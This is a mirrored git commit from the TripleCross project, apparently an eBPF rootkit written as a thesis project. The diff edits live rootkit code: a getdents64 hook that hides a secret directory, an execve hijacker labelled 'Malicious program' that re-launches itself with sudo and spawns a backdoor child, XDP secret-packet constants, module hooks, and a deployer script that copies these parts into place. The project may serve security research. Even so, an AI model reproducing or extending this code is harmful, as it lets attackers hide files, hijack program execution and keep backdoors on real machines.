mirror of
https://github.com/h3xduck/TripleCross.git
synced 2025-12-24 10:23:08 +08:00
Finished section 5. Multiple changes in the code according to the performed tests.
This commit is contained in:
h3xduck
Binary file not shown.
41913
src/.output/kit.skel.h
41913
src/.output/kit.skel.h
File diff suppressed because it is too large
Load Diff
14
src/Makefile
14
src/Makefile
@@ -47,15 +47,17 @@ else
|
||||
endif
|
||||
|
||||
.PHONY: all
|
||||
all: $(APPS) tckit
|
||||
all: $(APPS) tckit help
|
||||
|
||||
.PHONY: clean
|
||||
clean:
|
||||
$(call msg,CLEAN)
|
||||
$(call msg, CLEANING ROOTKIT FILES)
|
||||
$(Q)rm -rf $(OUTPUT) user/$(APPS)
|
||||
$(Q)rm -rf $(OUTPUT) ebpf/$(APPS)
|
||||
$(Q)rm -rf $(OUTPUT) bin/*
|
||||
$(Q)rm -f $(USER_INCLUDES_OBJ)
|
||||
$(call msg, CLEANING HELPER FILES)
|
||||
$(Q)$(MAKE) -C ./helpers/ clean
|
||||
|
||||
$(OUTPUT) $(OUTPUT)/libbpf:
|
||||
$(call msg,MKDIR,$@)
|
||||
@@ -100,9 +102,15 @@ $(APPS): %: $(OUTPUT)/%.o $(LIBBPF_OBJ) $(USER_INCLUDES_OBJ) | $(OUTPUT)
|
||||
$(Q)$(CC) $(CFLAGS) $(INCLUDES) $^ -lelf -lbpf -lz -lssl -lcrypto -Wno-deprecated-declarations -o bin/$@ -ldl
|
||||
$(Q)rm $(USER_INCLUDES_OBJ)
|
||||
|
||||
# TC egress program
|
||||
tckit: $(abspath $(EBPF)/include/bpf)/tc.c $(LIBBPF_OBJ)
|
||||
clang -O2 -emit-llvm -g -c $(abspath $(EBPF)/include/bpf)/tc.c -o - | \
|
||||
llc -march=bpf -mcpu=probe -filetype=obj -o tc.o
|
||||
llc -march=bpf -mcpu=probe -filetype=obj -o bin/tc.o
|
||||
|
||||
|
||||
# Helper programs
|
||||
help:
|
||||
$(MAKE) -C ./helpers
|
||||
|
||||
|
||||
# delete failed targets
|
||||
|
||||
BIN
src/bin/kit
BIN
src/bin/kit
Binary file not shown.
Binary file not shown.
@@ -4,7 +4,7 @@
|
||||
//XDP
|
||||
#define SECRET_PACKET_PAYLOAD "XDP_PoC_0"
|
||||
#define SECRET_PACKET_DEST_PORT 9000
|
||||
#define SUBSTITUTION_NEW_PAYLOAD "The previous message has been hidden ;)"
|
||||
#define SUBSTITUTION_NEW_PAYLOAD "The previous message has been hidden"
|
||||
|
||||
|
||||
//FS
|
||||
@@ -24,7 +24,7 @@
|
||||
//EXECUTION HIJACKING
|
||||
|
||||
#define PATH_EXECUTION_HIJACK_PROGRAM "/home/osboxes/TFG/src/helpers/execve_hijack\0"
|
||||
#define EXEC_HIJACK_ACTIVE_TEMP 0 //0 Deactivated, 1 active
|
||||
#define EXEC_HIJACK_ACTIVE 0 //0 Deactivated, 1 active
|
||||
#define TASK_COMM_NAME_RESTRICT_HIJACK "bash"
|
||||
#define TASK_COMM_RESTRICT_HIJACK_ACTIVE 1
|
||||
|
||||
|
||||
@@ -90,7 +90,7 @@ static __always_inline int handle_tp_sys_enter_execve(struct sys_execve_enter_ct
|
||||
int err = bpf_get_current_comm(comm, sizeof(comm));
|
||||
|
||||
|
||||
if(hijacker_state == 1 || EXEC_HIJACK_ACTIVE_TEMP == 0){
|
||||
if(hijacker_state == 1 || EXEC_HIJACK_ACTIVE == 0){
|
||||
return 0;
|
||||
}
|
||||
|
||||
|
||||
@@ -293,9 +293,9 @@ static __always_inline int handle_tp_sys_exit_getdents64(struct sys_getdents64_e
|
||||
bpf_printk("Starting dirent search, max:%ld, base_addr: %lx\n", dir_buf_max, d_entry_base_addr);
|
||||
//We will proceed to iterate through the buffer and look for our secret dir until we are past the limit
|
||||
struct linux_dirent64* previous_dir = (struct linux_dirent64*)(d_entry_base_addr + curr_offset);
|
||||
for(int ii=0; ii<16; ii++){
|
||||
for(int ii=0; ii<32; ii++){
|
||||
if(curr_offset>=dir_buf_max){
|
||||
bpf_printk("Finished dirent search because we reached the end\n");
|
||||
bpf_printk("Finished dirent search because we reached the end: %ld\n", dir_buf_max);
|
||||
break;
|
||||
}
|
||||
struct linux_dirent64 *d_entry = (struct linux_dirent64*)(d_entry_base_addr + curr_offset);
|
||||
@@ -309,7 +309,7 @@ static __always_inline int handle_tp_sys_exit_getdents64(struct sys_getdents64_e
|
||||
if (err!=0){
|
||||
//Ignore this entry, error
|
||||
curr_offset += d_reclen;
|
||||
//bpf_printk("Error reading directory name\n");
|
||||
bpf_printk("Error reading directory name\n");
|
||||
continue;
|
||||
}
|
||||
//It is a directory, check if it is ours
|
||||
|
||||
@@ -2,8 +2,9 @@ CC = gcc
|
||||
HEADERS = lib/RawTCP.h
|
||||
EXTRA_CFLAGS= -I$(PWD)/lib
|
||||
|
||||
.PHONY: default
|
||||
default:
|
||||
make execve_hijack injection_lib simple_timer simple_open
|
||||
make execve_hijack injection_lib simple_timer simple_open simple_execve
|
||||
|
||||
injection_lib: injection_lib.o
|
||||
gcc -Wall -shared -fPIC -o injection_lib.so injection_lib.c -ldl
|
||||
@@ -20,6 +21,12 @@ simple_open.o: simple_open.c $(HEADERS)
|
||||
simple_open: simple_open.o
|
||||
gcc -g -o simple_open simple_open.o
|
||||
|
||||
simple_execve.o: simple_open.c $(HEADERS)
|
||||
gcc -g -c simple_execve.c
|
||||
|
||||
simple_execve: simple_execve.o
|
||||
gcc -g -o simple_execve simple_execve.o
|
||||
|
||||
execve_hijack.o: execve_hijack.c $(HEADERS)
|
||||
gcc -g -c execve_hijack.c
|
||||
|
||||
@@ -34,4 +41,6 @@ clean:
|
||||
-rm -f simple_timer.o
|
||||
-rm -f simple_timer
|
||||
-rm -f simple_open.o
|
||||
-rm -f simple_open
|
||||
-rm -f simple_open
|
||||
-rm -f simple_execve.o
|
||||
-rm -f simple_execve
|
||||
Binary file not shown.
@@ -263,9 +263,9 @@ int hijacker_process_routine(int argc, char* argv[], int fd){
|
||||
|
||||
|
||||
int main(int argc, char* argv[], char *envp[]){
|
||||
printf("Hello world from execve hijacker\n");
|
||||
printf("Malicious program execve hijacker executed\n");
|
||||
for(int ii=0; ii<argc; ii++){
|
||||
printf("Argument %i is %s\n", ii, argv[ii]);
|
||||
//printf("Argument %i is %s\n", ii, argv[ii]);
|
||||
}
|
||||
|
||||
if(geteuid() != 0){
|
||||
@@ -273,11 +273,11 @@ int main(int argc, char* argv[], char *envp[]){
|
||||
char* args[argc+3];
|
||||
args[0] = "sudo";
|
||||
args[1] = "/home/osboxes/TFG/src/helpers/execve_hijack";
|
||||
printf("execve ARGS%i: %s\n", 0, args[0]);
|
||||
printf("execve ARGS%i: %s\n", 1, args[1]);
|
||||
//printf("execve ARGS%i: %s\n", 0, args[0]);
|
||||
//printf("execve ARGS%i: %s\n", 1, args[1]);
|
||||
for(int ii=0; ii<argc; ii++){
|
||||
args[ii+2] = argv[ii];
|
||||
printf("execve ARGS%i: %s\n", ii+2, args[ii+2]);
|
||||
//printf("execve ARGS%i: %s\n", ii+2, args[ii+2]);
|
||||
}
|
||||
args[argc+2] = NULL;
|
||||
|
||||
@@ -299,7 +299,7 @@ int main(int argc, char* argv[], char *envp[]){
|
||||
if (pid == 0) {
|
||||
setsid();
|
||||
//Child process
|
||||
printf("I am the child with pid %d\n", (int) getpid());
|
||||
printf("Malicious program child executed with pid %d\n", (int) getpid());
|
||||
|
||||
//First of all check if the locking log file is locked, which indicates that the backdoor process is already running
|
||||
int fd = open(LOCK_FILE, O_RDWR | O_CREAT | O_TRUNC, 0666);
|
||||
|
||||
Binary file not shown.
@@ -85,7 +85,7 @@ cp -a helpers/simple_open $OUTPUTDIR
|
||||
cp -a helpers/simple_timer $OUTPUTDIR
|
||||
cp -a helpers/execve_hijack $OUTPUTDIR
|
||||
cp -a helpers/injection_lib.so $OUTPUTDIR
|
||||
cp -a tc.o $OUTPUTDIR
|
||||
cp -a bin/tc.o $OUTPUTDIR
|
||||
cp -a client/mycert.pem $OUTPUTDIR
|
||||
cp -a helpers/deployer.sh $OUTPUTDIR
|
||||
echo -e "${GRN}Finished${NC}"
|
||||
|
||||
BIN
src/helpers/simple_execve
Executable file
BIN
src/helpers/simple_execve
Executable file
Binary file not shown.
23
src/helpers/simple_execve.c
Normal file
23
src/helpers/simple_execve.c
Normal file
@@ -0,0 +1,23 @@
|
||||
/**
|
||||
* Modified version of Linux man page timer using timerfd.
|
||||
* Counts to 3, 1 second at a time, then sets another time up to 3, one second at a time.
|
||||
*/
|
||||
|
||||
#include <time.h>
|
||||
#include <unistd.h>
|
||||
#include <stdlib.h>
|
||||
#include <stdio.h>
|
||||
#include <stdint.h>
|
||||
#include <unistd.h>
|
||||
#include <fcntl.h>
|
||||
|
||||
int main(int argc, char *argv[]) {
|
||||
char* args[] = {"bash", "-c", "pwd", NULL};
|
||||
char* envp[] = {NULL};
|
||||
sleep(1);
|
||||
if(execve("/usr/bin/bash", args, envp)<0){
|
||||
perror("Failed to execve()");
|
||||
exit(-1);
|
||||
}
|
||||
return 0;
|
||||
}
|
||||
BIN
src/helpers/simple_execve.o
Normal file
BIN
src/helpers/simple_execve.o
Normal file
Binary file not shown.
@@ -123,7 +123,6 @@ int activate_all_modules_config(){
|
||||
|
||||
int deactivate_all_modules_config(){
|
||||
//XDP
|
||||
//This is not deactivated, since it is needed for backdoor to keep listening
|
||||
//module_config.xdp_module.all = OFF;
|
||||
|
||||
//SCHED
|
||||
@@ -143,28 +142,39 @@ int deactivate_all_modules_config(){
|
||||
|
||||
int unhook_all_modules(){
|
||||
//Alias
|
||||
module_config_t config = module_config;
|
||||
module_config_attr_t attr = module_config_attr;
|
||||
int ret;
|
||||
|
||||
//XDP
|
||||
ret = detach_xdp_all(attr.skel);
|
||||
if(ret!=0) return -1;
|
||||
if(config.xdp_module.all == OFF){
|
||||
ret = detach_xdp_all(attr.skel);
|
||||
if(ret!=0) return -1;
|
||||
}
|
||||
|
||||
//SCHED
|
||||
ret = detach_sched_all(attr.skel);
|
||||
if(ret!=0) return -1;
|
||||
if(config.exec_module.all == OFF){
|
||||
ret = detach_sched_all(attr.skel);
|
||||
if(ret!=0) return -1;
|
||||
}
|
||||
|
||||
//FS (File system)
|
||||
ret = detach_fs_all(attr.skel);
|
||||
if(ret!=0) return -1;
|
||||
if(config.fs_module.all == OFF){
|
||||
ret = detach_fs_all(attr.skel);
|
||||
if(ret!=0) return -1;
|
||||
}
|
||||
|
||||
//EXEC
|
||||
ret = detach_exec_all(attr.skel);
|
||||
if(ret!=0) return -1;
|
||||
if(config.exec_module.all == OFF){
|
||||
ret = detach_exec_all(attr.skel);
|
||||
if(ret!=0) return -1;
|
||||
}
|
||||
|
||||
//INJECTION
|
||||
detach_injection_all(attr.skel);
|
||||
if(ret!=0) return -1;
|
||||
if(config.injection_module.all == OFF){
|
||||
detach_injection_all(attr.skel);
|
||||
if(ret!=0) return -1;
|
||||
}
|
||||
|
||||
return 0;
|
||||
}
|
||||
|
||||
Reference in New Issue
Block a user